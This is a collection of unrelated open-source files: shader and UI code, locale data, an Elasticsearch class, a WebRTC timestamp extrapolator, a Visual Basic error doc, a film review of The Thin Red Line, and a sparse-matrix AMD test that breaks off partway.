Album *_photoCDAlbum;
}
- (void)dealloc;
- (id)initWithImportSession:(id)arg1;
@end
| {
"pile_set_name": "Github"
} |
'use strict';
const glsl = require('glslify');
module.exports = function (regl, mesh) {
return regl({
vert: `
precision highp float;
attribute vec2 rth;
varying float psi, cp, rgrid;
varying vec2 uv, xy;
uniform mat4 modelview;
uniform vec2 mu, gridSize;
uniform float r0, theta0, n, circulation, scale, rsize, alpha, colorScale;
#define OPI2 0.15915494309
vec2 cdiv (vec2 a, vec2 b) {
return vec2(a.x * b.x + a.y * b.y, a.y * b.x - a.x * b.y) / dot(b, b);
}
vec2 cmul (vec2 a, vec2 b) {
return vec2(a.x * b.x - a.y * b.y, a.y * b.x + a.x * b.y);
}
vec2 csqr (vec2 a) {
return vec2(a.x * a.x - a.y * a.y, 2.0 * a.x * a.y);
}
vec2 cinv (vec2 a) {
return vec2(a.x, -a.y) / dot(a, a);
}
float cmag2 (vec2 a) {
return dot(a, a);
}
void main () {
uv = rth;
uv.x = pow(uv.x, 0.6666666);
uv *= gridSize;
uv.y *= OPI2;
rgrid = rth.x;
float r = 1.0 + rgrid * rsize;
float theta = rth.y + theta0;
vec2 rot = vec2(cos(alpha), sin(alpha));
vec2 zeta = r * vec2(cos(theta), sin(theta));
xy = (mu + r0 * zeta) - vec2(1, 0);
// Compute 1 + 1 / zeta and 1 - 1 / zeta:
vec2 oz = cinv(r0 * zeta + mu);
vec2 opz = oz;
vec2 omz = -oz;
opz.x += 1.0;
omz.x += 1.0;
// Exponentiate both of the above:
float opznarg = atan(opz.y, opz.x) * n;
float opznmod = pow(dot(opz, opz), n * 0.5);
// (1 + 1 / (zeta + mu)) ** n:
vec2 opzn = opznmod * vec2(cos(opznarg), sin(opznarg));
float omznarg = atan(omz.y, omz.x) * n;
float omznmod = pow(dot(omz, omz), n * 0.5);
// (1 - 1 / (zeta + mu)) ** n:
vec2 omzn = omznmod * vec2(cos(omznarg), sin(omznarg));
// Compute the potential:
vec2 circ = vec2(0.0, circulation * OPI2);
vec2 wt = rot - cdiv(csqr(cinv(zeta)), rot) + cdiv(circ, zeta);
// Compute the final coordinate, z:
vec2 z = n * cdiv(opzn + omzn, opzn - omzn);
//vec2 z = mu + r0 * zeta;
// Compute the jacobian:
vec2 dzdzeta = 4.0 * n * n * cdiv(cmul(opzn, omzn), cmul(csqr(r0 * zeta + mu) - vec2(1, 0), csqr(opzn - omzn)));
//vec2 dzdzeta = vec2(1, 0);
cp = 1.0 - cmag2(cdiv(wt, dzdzeta)) * colorScale;
// Compute z^2 - 1
psi = (r - 1.0 / r) * sin(theta + alpha) + circulation * OPI2 * log(r);
//z.x -= n;
//z /= scale;
//z.x += 0.5;
//z *= 4.0;
gl_Position = modelview * vec4(z, 0, 1);
}
`,
frag: glsl(`
#extension GL_OES_standard_derivatives : enable
precision highp float;
#pragma glslify: colormap = require(glsl-colormap/viridis)
varying float psi, cp, rgrid;
varying vec2 uv, xy;
uniform float cpAlpha, streamAlpha, gridAlpha;
uniform vec2 mu;
#pragma glslify: grid = require(glsl-solid-wireframe/cartesian/scaled)
const float feather = 1.0;
const float streamWidth = 0.75;
const float pressureWidth = 0.75;
const float boundaryWidth = 3.0;
void main () {
float boundary = grid(rgrid, boundaryWidth, feather);
float pressure = 1.0 - (1.0 - grid(cp * 20.0, pressureWidth, feather)) * cpAlpha;
float stream = ((1.0 - grid(1.5 * psi, streamWidth, feather)) + 0.4 * (1.0 - grid(15.0 * psi, streamWidth, feather))) * streamAlpha;
vec3 color = colormap(max(0.0, min(1.0, cp))).xyz;
float gridLines = ((1.0 - grid(xy, 0.75, feather)) + 0.4 * (1.0 - grid(xy * 10.0, 0.75, feather))) * gridAlpha;
color *= 1.0 - gridLines;
gl_FragColor = vec4((color * pressure + stream) * boundary, 1);
}
`),
attributes: {
rth: mesh.positions,
//barycentric: mesh.barycentric,
},
depth: {
enable: false
},
elements: mesh.cells,
count: mesh.cells.length * 3
});
};
| {
"pile_set_name": "Github"
} |
---
title: La instrucción 'Option <specifier>' solo puede aparecer una vez en cada archivo
ms.date: 07/20/2015
f1_keywords:
- bc30225
- vbc30225
helpviewer_keywords:
- BC30225
ms.assetid: 56970b37-7262-4a8f-ac01-2bb2cc8503de
ms.openlocfilehash: 616470f89d7676143c3c429efaa02cf63f72fd60
ms.sourcegitcommit: bf5c5850654187705bc94cc40ebfb62fe346ab02
ms.translationtype: MT
ms.contentlocale: es-ES
ms.lasthandoff: 09/23/2020
ms.locfileid: "91089876"
---
# <a name="option-specifier-statement-can-only-appear-once-per-file"></a>La instrucción 'Option \<specifier>' solo puede aparecer una vez en cada archivo
Las instrucciones `Option Compare`, `Option Explicit`y `Option Strict` solo pueden usarse una vez cada una en el mismo archivo de origen.
**Identificador de error:** BC30225
## <a name="to-correct-this-error"></a>Para corregir este error
- Quite la instrucción `Option` duplicada.
## <a name="see-also"></a>Vea también
- [Option ( \<keyword> instrucción)](../language-reference/statements/option-keyword-statement.md)
- [Option Compare (instrucción)](../language-reference/statements/option-compare-statement.md)
- [Option Explicit (instrucción)](../language-reference/statements/option-explicit-statement.md)
- [Option Strict (instrucción)](../language-reference/statements/option-strict-statement.md)
| {
"pile_set_name": "Github"
} |
ace.define("ace/snippets/vala",["require","exports","module"], function(require, exports, module) {
"use strict";
exports.snippets = [
{
"content": "case ${1:condition}:\n\t$0\n\tbreak;\n",
"name": "case",
"scope": "vala",
"tabTrigger": "case"
},
{
"content": "/**\n * ${6}\n */\n${1:public} class ${2:MethodName}${3: : GLib.Object} {\n\n\t/**\n\t * ${7}\n\t */\n\tpublic ${2}(${4}) {\n\t\t${5}\n\t}\n\n\t$0\n}",
"name": "class",
"scope": "vala",
"tabTrigger": "class"
},
{
"content": "(${1}) => {\n\t${0}\n}\n",
"name": "closure",
"scope": "vala",
"tabTrigger": "=>"
},
{
"content": "/*\n * $0\n */",
"name": "Comment (multiline)",
"scope": "vala",
"tabTrigger": "/*"
},
{
"content": "Console.WriteLine($1);\n$0",
"name": "Console.WriteLine (writeline)",
"scope": "vala",
"tabTrigger": "writeline"
},
{
"content": "[DBus(name = \"$0\")]",
"name": "DBus annotation",
"scope": "vala",
"tabTrigger": "[DBus"
},
{
"content": "delegate ${1:void} ${2:DelegateName}($0);",
"name": "delegate",
"scope": "vala",
"tabTrigger": "delegate"
},
{
"content": "do {\n\t$0\n} while ($1);\n",
"name": "do while",
"scope": "vala",
"tabTrigger": "dowhile"
},
{
"content": "/**\n * $0\n */",
"name": "DocBlock",
"scope": "vala",
"tabTrigger": "/**"
},
{
"content": "else if ($1) {\n\t$0\n}\n",
"name": "else if (elseif)",
"scope": "vala",
"tabTrigger": "elseif"
},
{
"content": "else {\n\t$0\n}",
"name": "else",
"scope": "vala",
"tabTrigger": "else"
},
{
"content": "enum {$1:EnumName} {\n\t$0\n}",
"name": "enum",
"scope": "vala",
"tabTrigger": "enum"
},
{
"content": "public errordomain ${1:Error} {\n\t$0\n}",
"name": "error domain",
"scope": "vala",
"tabTrigger": "errordomain"
},
{
"content": "for ($1;$2;$3) {\n\t$0\n}",
"name": "for",
"scope": "vala",
"tabTrigger": "for"
},
{
"content": "foreach ($1 in $2) {\n\t$0\n}",
"name": "foreach",
"scope": "vala",
"tabTrigger": "foreach"
},
{
"content": "Gee.ArrayList<${1:G}>($0);",
"name": "Gee.ArrayList",
"scope": "vala",
"tabTrigger": "ArrayList"
},
{
"content": "Gee.HashMap<${1:K},${2:V}>($0);",
"name": "Gee.HashMap",
"scope": "vala",
"tabTrigger": "HashMap"
},
{
"content": "Gee.HashSet<${1:G}>($0);",
"name": "Gee.HashSet",
"scope": "vala",
"tabTrigger": "HashSet"
},
{
"content": "if ($1) {\n\t$0\n}",
"name": "if",
"scope": "vala",
"tabTrigger": "if"
},
{
"content": "interface ${1:InterfaceName}{$2: : SuperInterface} {\n\t$0\n}",
"name": "interface",
"scope": "vala",
"tabTrigger": "interface"
},
{
"content": "public static int main(string [] argv) {\n\t${0}\n\treturn 0;\n}",
"name": "Main function",
"scope": "vala",
"tabTrigger": "main"
},
{
"content": "namespace $1 {\n\t$0\n}\n",
"name": "namespace (ns)",
"scope": "vala",
"tabTrigger": "ns"
},
{
"content": "stdout.printf($0);",
"name": "printf",
"scope": "vala",
"tabTrigger": "printf"
},
{
"content": "${1:public} ${2:Type} ${3:Name} {\n\tset {\n\t\t$0\n\t}\n\tget {\n\n\t}\n}",
"name": "property (prop)",
"scope": "vala",
"tabTrigger": "prop"
},
{
"content": "${1:public} ${2:Type} ${3:Name} {\n\tget {\n\t\t$0\n\t}\n}",
"name": "read-only property (roprop)",
"scope": "vala",
"tabTrigger": "roprop"
},
{
"content": "@\"${1:\\$var}\"",
"name": "String template (@)",
"scope": "vala",
"tabTrigger": "@"
},
{
"content": "struct ${1:StructName} {\n\t$0\n}",
"name": "struct",
"scope": "vala",
"tabTrigger": "struct"
},
{
"content": "switch ($1) {\n\t$0\n}",
"name": "switch",
"scope": "vala",
"tabTrigger": "switch"
},
{
"content": "try {\n\t$2\n} catch (${1:Error} e) {\n\t$0\n}",
"name": "try/catch",
"scope": "vala",
"tabTrigger": "try"
},
{
"content": "\"\"\"$0\"\"\";",
"name": "Verbatim string (\"\"\")",
"scope": "vala",
"tabTrigger": "verbatim"
},
{
"content": "while ($1) {\n\t$0\n}",
"name": "while",
"scope": "vala",
"tabTrigger": "while"
}
];
exports.scope = "";
});
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<productsPages:CategoryListPageXaml
xmlns="http://xamarin.com/schemas/2014/forms"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
x:Class="XamarinCRM.Pages.Products.CategoryListPage"
xmlns:productsPages="clr-namespace:XamarinCRM.Pages.Products"
xmlns:productsViews="clr-namespace:XamarinCRM.Views.Products"
Title="{Binding Title}">
<productsViews:CategoryListView
IsPullToRefreshEnabled="True"
ItemsSource="{Binding SubCategories}"
RefreshCommand="{Binding LoadCategoriesRemoteCommand}"
IsRefreshing="{Binding IsBusy, Mode=OneWay}"
ItemTapped="CategoryItemTapped" />
</productsPages:CategoryListPageXaml>
| {
"pile_set_name": "Github"
} |
class Storage
constructor: (opts={}) ->
@key = opts.id or "new"
getKey: ->
"post-#{@key}"
put: (data, ttl = 30000) ->
# Save it manually so the first load has data.
$.jStorage.set @getKey(), data, ttl
# Publish the data so any listeners can update.
$.jStorage.publish @getKey(), data
get: (default_val = {}) ->
$.jStorage.get @getKey(), default_val
destroy: ->
$.jStorage.deleteKey @getKey()
| {
"pile_set_name": "Github"
} |
binary_logic:
name: Binary Logic
logic_over_data:
name: Logic Over Data | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2011 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
#include "rtc_base/time/timestamp_extrapolator.h"
#include <algorithm>
namespace webrtc {
TimestampExtrapolator::TimestampExtrapolator(int64_t start_ms)
: _rwLock(RWLockWrapper::CreateRWLock()),
_startMs(0),
_firstTimestamp(0),
_wrapArounds(0),
_prevUnwrappedTimestamp(-1),
_prevWrapTimestamp(-1),
_lambda(1),
_firstAfterReset(true),
_packetCount(0),
_startUpFilterDelayInPackets(2),
_detectorAccumulatorPos(0),
_detectorAccumulatorNeg(0),
_alarmThreshold(60e3),
_accDrift(6600), // in timestamp ticks, i.e. 15 ms
_accMaxError(7000),
_pP11(1e10) {
Reset(start_ms);
}
TimestampExtrapolator::~TimestampExtrapolator() {
delete _rwLock;
}
void TimestampExtrapolator::Reset(int64_t start_ms) {
WriteLockScoped wl(*_rwLock);
_startMs = start_ms;
_prevMs = _startMs;
_firstTimestamp = 0;
_w[0] = 90.0;
_w[1] = 0;
_pP[0][0] = 1;
_pP[1][1] = _pP11;
_pP[0][1] = _pP[1][0] = 0;
_firstAfterReset = true;
_prevUnwrappedTimestamp = -1;
_prevWrapTimestamp = -1;
_wrapArounds = 0;
_packetCount = 0;
_detectorAccumulatorPos = 0;
_detectorAccumulatorNeg = 0;
}
void TimestampExtrapolator::Update(int64_t tMs, uint32_t ts90khz) {
_rwLock->AcquireLockExclusive();
if (tMs - _prevMs > 10e3) {
// Ten seconds without a complete frame.
// Reset the extrapolator
_rwLock->ReleaseLockExclusive();
Reset(tMs);
_rwLock->AcquireLockExclusive();
} else {
_prevMs = tMs;
}
// Remove offset to prevent badly scaled matrices
tMs -= _startMs;
CheckForWrapArounds(ts90khz);
int64_t unwrapped_ts90khz =
static_cast<int64_t>(ts90khz) +
_wrapArounds * ((static_cast<int64_t>(1) << 32) - 1);
if (_firstAfterReset) {
// Make an initial guess of the offset,
// should be almost correct since tMs - _startMs
// should about zero at this time.
_w[1] = -_w[0] * tMs;
_firstTimestamp = unwrapped_ts90khz;
_firstAfterReset = false;
}
double residual = (static_cast<double>(unwrapped_ts90khz) - _firstTimestamp) -
static_cast<double>(tMs) * _w[0] - _w[1];
if (DelayChangeDetection(residual) &&
_packetCount >= _startUpFilterDelayInPackets) {
// A sudden change of average network delay has been detected.
// Force the filter to adjust its offset parameter by changing
// the offset uncertainty. Don't do this during startup.
_pP[1][1] = _pP11;
}
if (_prevUnwrappedTimestamp >= 0 &&
unwrapped_ts90khz < _prevUnwrappedTimestamp) {
// Drop reordered frames.
_rwLock->ReleaseLockExclusive();
return;
}
// T = [t(k) 1]';
// that = T'*w;
// K = P*T/(lambda + T'*P*T);
double K[2];
K[0] = _pP[0][0] * tMs + _pP[0][1];
K[1] = _pP[1][0] * tMs + _pP[1][1];
double TPT = _lambda + tMs * K[0] + K[1];
K[0] /= TPT;
K[1] /= TPT;
// w = w + K*(ts(k) - that);
_w[0] = _w[0] + K[0] * residual;
_w[1] = _w[1] + K[1] * residual;
// P = 1/lambda*(P - K*T'*P);
double p00 =
1 / _lambda * (_pP[0][0] - (K[0] * tMs * _pP[0][0] + K[0] * _pP[1][0]));
double p01 =
1 / _lambda * (_pP[0][1] - (K[0] * tMs * _pP[0][1] + K[0] * _pP[1][1]));
_pP[1][0] =
1 / _lambda * (_pP[1][0] - (K[1] * tMs * _pP[0][0] + K[1] * _pP[1][0]));
_pP[1][1] =
1 / _lambda * (_pP[1][1] - (K[1] * tMs * _pP[0][1] + K[1] * _pP[1][1]));
_pP[0][0] = p00;
_pP[0][1] = p01;
_prevUnwrappedTimestamp = unwrapped_ts90khz;
if (_packetCount < _startUpFilterDelayInPackets) {
_packetCount++;
}
_rwLock->ReleaseLockExclusive();
}
int64_t TimestampExtrapolator::ExtrapolateLocalTime(uint32_t timestamp90khz) {
ReadLockScoped rl(*_rwLock);
int64_t localTimeMs = 0;
CheckForWrapArounds(timestamp90khz);
double unwrapped_ts90khz =
static_cast<double>(timestamp90khz) +
_wrapArounds * ((static_cast<int64_t>(1) << 32) - 1);
if (_packetCount == 0) {
localTimeMs = -1;
} else if (_packetCount < _startUpFilterDelayInPackets) {
localTimeMs =
_prevMs +
static_cast<int64_t>(
static_cast<double>(unwrapped_ts90khz - _prevUnwrappedTimestamp) /
90.0 +
0.5);
} else {
if (_w[0] < 1e-3) {
localTimeMs = _startMs;
} else {
double timestampDiff =
unwrapped_ts90khz - static_cast<double>(_firstTimestamp);
localTimeMs = static_cast<int64_t>(static_cast<double>(_startMs) +
(timestampDiff - _w[1]) / _w[0] + 0.5);
}
}
return localTimeMs;
}
// Investigates if the timestamp clock has overflowed since the last timestamp
// and keeps track of the number of wrap arounds since reset.
void TimestampExtrapolator::CheckForWrapArounds(uint32_t ts90khz) {
if (_prevWrapTimestamp == -1) {
_prevWrapTimestamp = ts90khz;
return;
}
if (ts90khz < _prevWrapTimestamp) {
// This difference will probably be less than -2^31 if we have had a wrap
// around (e.g. timestamp = 1, _previousTimestamp = 2^32 - 1). Since it is
// casted to a Word32, it should be positive.
if (static_cast<int32_t>(ts90khz - _prevWrapTimestamp) > 0) {
// Forward wrap around
_wrapArounds++;
}
} else {
// This difference will probably be less than -2^31 if we have had a
// backward wrap around. Since it is casted to a Word32, it should be
// positive.
if (static_cast<int32_t>(_prevWrapTimestamp - ts90khz) > 0) {
// Backward wrap around
_wrapArounds--;
}
}
_prevWrapTimestamp = ts90khz;
}
bool TimestampExtrapolator::DelayChangeDetection(double error) {
// CUSUM detection of sudden delay changes
error = (error > 0) ? std::min(error, _accMaxError)
: std::max(error, -_accMaxError);
_detectorAccumulatorPos =
std::max(_detectorAccumulatorPos + error - _accDrift, double{0});
_detectorAccumulatorNeg =
std::min(_detectorAccumulatorNeg + error + _accDrift, double{0});
if (_detectorAccumulatorPos > _alarmThreshold ||
_detectorAccumulatorNeg < -_alarmThreshold) {
// Alarm
_detectorAccumulatorPos = _detectorAccumulatorNeg = 0;
return true;
}
return false;
}
} // namespace webrtc
| {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2017 The Weibo-Picture-Store Authors. All rights reserved.
* Use of this source code is governed by a MIT-style license that can be
* found in the LICENSE file.
*/
body {
margin: 0;
font-size: 1rem;
font-family: "Helvetica Neue", "Segoe UI", Arial, sans-serif;
}
h1,
h2,
h3,
h4,
h5,
h6 {
margin-top: 0;
margin-bottom: 0;
}
ol,
ul {
margin-top: 0;
margin-bottom: 0;
padding-left: 0;
list-style-type: none;
}
a {
outline-style: none;
text-decoration: none;
}
img {
vertical-align: middle;
border-style: none;
}
button,
input,
select {
font: inherit;
margin: 0;
outline-style: none;
overflow: visible;
}
textarea {
font: inherit;
margin: 0;
outline-style: none;
overflow: auto;
resize: none;
}
table {
border-collapse: collapse;
border-spacing: 0;
}
| {
"pile_set_name": "Github"
} |
/*
* Licensed to Elasticsearch under one or more contributor
* license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright
* ownership. Elasticsearch licenses this file to you under
* the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.elasticsearch.client.transform.transforms;
import org.elasticsearch.common.ParseField;
import org.elasticsearch.common.xcontent.ConstructingObjectParser;
import org.elasticsearch.common.xcontent.ObjectParser.ValueType;
import org.elasticsearch.common.xcontent.XContentParser;
import java.io.IOException;
import java.util.Collections;
import java.util.Map;
import java.util.Objects;
import static org.elasticsearch.common.xcontent.ConstructingObjectParser.optionalConstructorArg;
/**
* Holds state of the cursors:
*
* indexer_position: the position of the indexer querying the source
* bucket_position: the position used for identifying changes
*/
public class TransformIndexerPosition {
public static final ParseField INDEXER_POSITION = new ParseField("indexer_position");
public static final ParseField BUCKET_POSITION = new ParseField("bucket_position");
private final Map<String, Object> indexerPosition;
private final Map<String, Object> bucketPosition;
@SuppressWarnings("unchecked")
public static final ConstructingObjectParser<TransformIndexerPosition, Void> PARSER = new ConstructingObjectParser<>(
"transform_indexer_position",
true,
args -> new TransformIndexerPosition((Map<String, Object>) args[0],(Map<String, Object>) args[1]));
static {
PARSER.declareField(optionalConstructorArg(), XContentParser::mapOrdered, INDEXER_POSITION, ValueType.OBJECT);
PARSER.declareField(optionalConstructorArg(), XContentParser::mapOrdered, BUCKET_POSITION, ValueType.OBJECT);
}
public TransformIndexerPosition(Map<String, Object> indexerPosition, Map<String, Object> bucketPosition) {
this.indexerPosition = indexerPosition == null ? null : Collections.unmodifiableMap(indexerPosition);
this.bucketPosition = bucketPosition == null ? null : Collections.unmodifiableMap(bucketPosition);
}
public Map<String, Object> getIndexerPosition() {
return indexerPosition;
}
public Map<String, Object> getBucketsPosition() {
return bucketPosition;
}
@Override
public boolean equals(Object other) {
if (this == other) {
return true;
}
if (other == null || getClass() != other.getClass()) {
return false;
}
TransformIndexerPosition that = (TransformIndexerPosition) other;
return Objects.equals(this.indexerPosition, that.indexerPosition) &&
Objects.equals(this.bucketPosition, that.bucketPosition);
}
@Override
public int hashCode() {
return Objects.hash(indexerPosition, bucketPosition);
}
public static TransformIndexerPosition fromXContent(XContentParser parser) {
try {
return PARSER.parse(parser, null);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}
| {
"pile_set_name": "Github"
} |
'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
function getDecimals(n) {
n = n + '';
var i = n.indexOf('.');
return (i == -1) ? 0 : n.length - i - 1;
}
function getVF(n, opt_precision) {
var v = opt_precision;
if (undefined === v) {
v = Math.min(getDecimals(n), 3);
}
var base = Math.pow(10, v);
var f = ((n * base) | 0) % base;
return {v: v, f: f};
}
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"fm",
"em"
],
"DAY": [
"s\u00f6ndag",
"m\u00e5ndag",
"tisdag",
"onsdag",
"torsdag",
"fredag",
"l\u00f6rdag"
],
"ERANAMES": [
"f\u00f6re Kristus",
"efter Kristus"
],
"ERAS": [
"f.Kr.",
"e.Kr."
],
"MONTH": [
"januari",
"februari",
"mars",
"april",
"maj",
"juni",
"juli",
"augusti",
"september",
"oktober",
"november",
"december"
],
"SHORTDAY": [
"s\u00f6n",
"m\u00e5n",
"tis",
"ons",
"tors",
"fre",
"l\u00f6r"
],
"SHORTMONTH": [
"jan.",
"feb.",
"mars",
"apr.",
"maj",
"juni",
"juli",
"aug.",
"sep.",
"okt.",
"nov.",
"dec."
],
"fullDate": "EEEE'en' 'den' d:'e' MMMM y",
"longDate": "d MMMM y",
"medium": "d MMM y HH:mm:ss",
"mediumDate": "d MMM y",
"mediumTime": "HH:mm:ss",
"short": "dd-MM-y HH:mm",
"shortDate": "dd-MM-y",
"shortTime": "HH:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "\u20ac",
"DECIMAL_SEP": ",",
"GROUP_SEP": "\u00a0",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "-",
"negSuf": "\u00a0\u00a4",
"posPre": "",
"posSuf": "\u00a0\u00a4"
}
]
},
"id": "sv-fi",
"pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]);
| {
"pile_set_name": "Github"
} |
what i look for in a movie is not necessarily perfection .
sometimes a movie has such strong ideas that despite whatever flaws it may have , i will prefer it to a better-made film that is not as thought-provoking .
the thin red line is flawed but it provokes .
terence malick returns to filmmaking 20 years after days of heaven and produces this meditative look at war .
unlike this year's saving private ryan , which dwells on war as a necessary evil and explores the moral ambiguities thereof , the thin red line simply says war is waste .
while that might seem obvious to some , only after experiencing the film do you realize how profound a waste it is .
saving private ryan has an underlying and practical acceptance that war will occur and it has a great cost ; the thin red line says idealistically avoid this at all costs .
one message is not necessarily more correct than the other .
it just depends on one's point of view .
in malick's film , war is set in a tropical paradise , and john toll's cinematography is beyond lush .
the setting poses the question , why are we fighting in the face of such beauty ?
in saving private ryan , the capture of a german soldier presents the moral quandary of whether to let him go .
in the thin red line , the japanese present the moral quandary of war in the first place .
they are just like the americans -- frightened and angry , grieving and praying .
all that separates them is war .
the flaw in the thin red line comes in the voice-overs .
unbelievable as coming from the characters and sometimes pretentious , sometimes corny , the voice-overs tell us what the images before us already do and are completely unnecessary .
dispensing with them , malick could have achieved a tarkovskian grandeur .
instead , he gets distracting self-consciousness .
aside from that , malick's direction is stunning .
the tracking shots across windswept hills and around transports speeding toward shore are extraordinary .
sean penn , elias koteas , and nick nolte give the best performances .
penn is subtle as a sergeant trying to hide his humanism , koteas is genuine as a compassionate captain , and nolte startling as a colonel whose blood vessels are about to burst if he cannot win his battle .
john travolta and george clooney are the worst in cameo roles .
ultimately however , the thin red line's interest is not in the characters and it is not in drama .
it has been frequently criticized for its lack of dramatic structure , but malick clearly has different things on his mind .
has no one ever thought that getting dramatic entertainment from war is exploitative ?
what malick is working with is theme , and in that , the thin red line is most provoking .
| {
"pile_set_name": "Github"
} |
/* ========================================================================== */
/* === Tcov/amdtest ========================================================= */
/* ========================================================================== */
/* -----------------------------------------------------------------------------
* CHOLMOD/Tcov Module. Copyright (C) 2005-2006, Timothy A. Davis
* The CHOLMOD/Tcov Module is licensed under Version 2.0 of the GNU
* General Public License. See gpl.txt for a text of the license.
* CHOLMOD is also available under other licenses; contact authors for details.
* http://www.suitesparse.com
* -------------------------------------------------------------------------- */
/* Test for amd v2.0 */
#include "cm.h"
#include "amd.h"
/* ========================================================================== */
/* === amdtest ============================================================== */
/* ========================================================================== */
void amdtest (cholmod_sparse *A)
{
double Control [AMD_CONTROL], Info [AMD_INFO], alpha ;
Int *P, *Cp, *Ci, *Sp, *Si, *Bp, *Bi, *Ep, *Ei, *Fp, *Fi,
*Len, *Nv, *Next, *Head, *Elen, *Deg, *Wi, *W, *Flag ;
cholmod_sparse *C, *B, *S, *E, *F ;
Int i, j, n, nrow, ncol, ok, cnz, bnz, p, trial, sorted ;
/* ---------------------------------------------------------------------- */
/* get inputs */
/* ---------------------------------------------------------------------- */
printf ("\nAMD test\n") ;
if (A == NULL)
{
return ;
}
if (A->stype)
{
B = CHOLMOD(copy) (A, 0, 0, cm) ;
}
else
{
B = CHOLMOD(aat) (A, NULL, 0, 0, cm) ;
}
if (A->nrow != A->ncol)
{
F = CHOLMOD(copy_sparse) (B, cm) ;
OK (F->nrow == F->ncol) ;
CHOLMOD(sort) (F, cm) ;
}
else
{
/* A is square and unsymmetric, and may have entries in A+A' that
* are not in A */
F = CHOLMOD(copy_sparse) (A, cm) ;
CHOLMOD(sort) (F, cm) ;
}
C = CHOLMOD(copy_sparse) (B, cm) ;
nrow = C->nrow ;
ncol = C->ncol ;
n = nrow ;
OK (nrow == ncol) ;
Cp = C->p ;
Ci = C->i ;
Bp = B->p ;
Bi = B->i ;
/* ---------------------------------------------------------------------- */
/* S = sorted form of B, using AMD_preprocess */
/* ---------------------------------------------------------------------- */
cnz = CHOLMOD(nnz) (C, cm) ;
S = CHOLMOD(allocate_sparse) (n, n, cnz, TRUE, TRUE, 0, CHOLMOD_PATTERN,
cm);
Sp = S->p ;
Si = S->i ;
W = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
Flag = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
AMD_preprocess (n, Bp, Bi, Sp, Si, W, Flag) ;
/* ---------------------------------------------------------------------- */
/* allocate workspace for amd */
/* ---------------------------------------------------------------------- */
P = CHOLMOD(malloc) (n+1, sizeof (Int), cm) ;
Len = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
Nv = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
Next = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
Head = CHOLMOD(malloc) (n+1, sizeof (Int), cm) ;
Elen = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
Deg = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
Wi = CHOLMOD(malloc) (n, sizeof (Int), cm) ;
/* ---------------------------------------------------------------------- */
for (sorted = 0 ; sorted <= 1 ; sorted++)
{
if (sorted) CHOLMOD(sort) (C, cm) ;
Cp = C->p ;
Ci = C->i ;
/* ------------------------------------------------------------------ */
/* order C with AMD_order */
/* ------------------------------------------------------------------ */
AMD_defaults (Control) ;
AMD_defaults (NULL) ;
AMD_control (Control) ;
AMD_control (NULL) ;
AMD_info (NULL) ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
printf ("amd return value: "ID"\n", ok) ;
AMD_info (Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation", cm)) ;
/* no dense rows/cols */
alpha = Control [AMD_DENSE] ;
Control [AMD_DENSE] = -1 ;
AMD_control (Control) ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
printf ("amd return value: "ID"\n", ok) ;
AMD_info (Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation (alpha=-1)", cm)) ;
/* many dense rows/cols */
Control [AMD_DENSE] = 0 ;
AMD_control (Control) ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
printf ("amd return value: "ID"\n", ok) ;
AMD_info (Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation (alpha=0)", cm)) ;
Control [AMD_DENSE] = alpha ;
/* no aggressive absorption */
Control [AMD_AGGRESSIVE] = FALSE ;
AMD_control (Control) ;
ok = AMD_order (n, Cp, Ci, P, Control, Info) ;
printf ("amd return value: "ID"\n", ok) ;
AMD_info (Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
OK (CHOLMOD(print_perm) (P, n, n, "AMD permutation (no agg) ", cm)) ;
Control [AMD_AGGRESSIVE] = TRUE ;
/* ------------------------------------------------------------------ */
/* order F with AMD_order */
/* ------------------------------------------------------------------ */
Fp = F->p ;
Fi = F->i ;
ok = AMD_order (n, Fp, Fi, P, Control, Info) ;
printf ("amd return value: "ID"\n", ok) ;
AMD_info (Info) ;
OK (sorted ? (ok == AMD_OK) : (ok >= AMD_OK)) ;
